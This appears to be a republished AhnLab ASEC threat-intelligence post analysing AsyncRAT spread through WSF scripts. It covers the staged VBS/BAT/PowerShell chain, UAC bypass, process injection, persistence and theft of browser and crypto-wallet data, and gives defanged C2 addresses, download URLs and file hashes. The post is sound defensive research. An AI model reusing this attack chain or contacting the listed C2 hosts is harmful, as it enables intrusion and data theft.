FOCUS MODE
EXTRACT IOC
Threat Research

AsyncRAT Distributed via WSF Script – ASEC BLOG

Securonix

The AhnLab Security Emergency response Center (ASEC) analysis team previously posted about AsyncRAT being distributed via files with the .chm extension. [1] It was recently discovered that this type of AsyncRAT malware is now being distributed in WSF script format. The WSF file was found to be distributed in a compressed file (.zip) format through URLs contained within emails.

[Download URLs]
1. https://*****************.com.br/Pay5baea1WP7.zip
2. https://************.za.com/Order_ed333c91f0fd.zip
3. https://*************.com/PAY37846wp.zip
4. https://*****.****.co/eBills37890913.zip

Decompressing the first downloaded zip file yields a file with a .wsf file extension. This file mostly consists of comments as shown in the image below and only contains one <script> tag in the middle.

Figure 1. The download link in the WSF script

When this script is executed, a Visual Basic script is downloaded and run as shown below. This script downloads a .jpg file (a zip file disguised as a jpg file) from the same C2 address.
Afterwards, it changes the file extension of this jpg file to .zip before decompressing it. The command string that executes the file Error.vbs also contained in the compressed file is created into an xml file (C:UsersPublictemp.xml) and run with PowerShell.

Figure 2. The downloaded script (c.txt)

The downloaded zip file contains many other scripts aside from the Error.vbs file.

Figure 3. The downloaded zip file (x.jpg)

Afterwards, the remaining files (bat, ps1) are all executed in order. The role and execution flow of each file are given below.

Error.vbs: Checking for administrator permission and executing Error.bat
Error.bat: Bypassing UAC and executing Error.ps1
Error.ps1: Creating the shortcut file C:UsersPublicChrome.lnk, registering it to autorun (registry), then executing it
pwng.bat: Bypassing UAC and executing pwng.ps1
pwng.ps1: Fileless attack

Figure 4. A diagram of the attack flow

The file pwng.ps1 which is executed last converts the contained strings into a .NET binary before loading and executing the binary. It runs by executing a legitimate process (aspnet_compiler.exe) and injecting a malicious binary into this process. During these steps, three obfuscated variables are used.

Figure 5. The PowerShell script launching a fileless attack (pwng.ps1)

[Meaning of Key Variables]
$jsewy: Malware that performs the features of AsyncRAT (the file to be injected into aspnet_compiler.exe)
$jsewty: Malware that performs the injection feature
$KRDESEY: The process the malware is injected into (C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe)

The malware executed in the end is identified as AsyncRAT which has information exfiltration and backdoor features. The key behaviors are as follows.

1. Maintaining Persistence
– Using schtasks to add a scheduled task
– Adding a registry
– Creating a bat file that executes and terminates itself

Figure 6. The code to maintain persistence

2. Exfiltrating Information
– Computer information: OS version, users, anti-malware product list, etc.
– UserData information in browsers: Chrome, Brave-Browser, Edge
– Cryptocurrency wallet information: RabbyWallet, Atomic, Exodus, Ledger_Live, Electrum, Coinomi, Binance, Bitcoin

Figure 7. The code that collects the system’s information (obfuscated)
Figure 8. The buffer where the exfiltrated data is saved

Additionally, the C2 server where this information is sent is contained within the file as an encrypted string and is displayed as follows upon execution. The threat actor combines this C2 domain and multiple port numbers to make multiple connection attempts.

Figure 9. A string contained in the C2 access code and the buffer upon execution

As such, the threat actor distributes the same malware in various ways, using elaborate fileless methods without EXE files. Users must always be cautious when opening files or external links contained within emails and use monitoring features in security products to identify and restrict access from threat actors.

[File Detection]

  • Downloader/Script.Agent (2023.11.29.02)
  • Trojan/VBS.RUNNER.SC194987 (2023.11.30.04)
  • Trojan/BAT.RUNNER.SC194988 (2023.11.30.04)
  • Trojan/BAT.RUNNER.SC194985 (2023.11.30.04)
  • Trojan/PowerShell.Runner.SC194986 (2023.11.30.04)
  • Trojan/PowerShell.Generic.SC194981 (2023.11.30.04)
  • Trojan/PowerShell.Generic.SC194982 (2023.11.30.04)
  • Trojan/Win.Injector (2023.11.30.04)
  • Backdoor/Win.AsyncRAT (2022.07.12.00)

[IOC]

  • MD5
    750dc2354b0454eafd66900687a0f7d6 (myfax_nov272023.wsf)
    790562cefbb2c6b9d890b6d2b4adc548 (Error.vbs)
    a31191ca8fe50b0a70eb48b82c4d6f39 (Error.bat)
    0a80a592d407a2a8b8b318286dc30769 (Error.ps1)
    61b7507a6814e81cda6b57850f9f31da (pwng.bat)
    ac12d457d3ee177af8824cdc1de47f2a (pwng.ps1)
    c09266666ee71ade24e0e5f889cc8199
    b98e76816350a6a527fc311dae62b85e
  • C2
    hxxp://185.81.157[.]242:222/c.txt
    hxxp://185.81.157[.]242:222/x.jpg
    drippmedsot.mywire[.]org:6606
    drippmedsot.mywire[.]org:7707
    drippmedsot.mywire[.]org:8808

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IoC and detailed analysis information.

Source: https://asec.ahnlab.com/en/59573/

Tags: TROJAN, EXFILTRATION, PERSISTENCE, BROWSER, BACKDOOR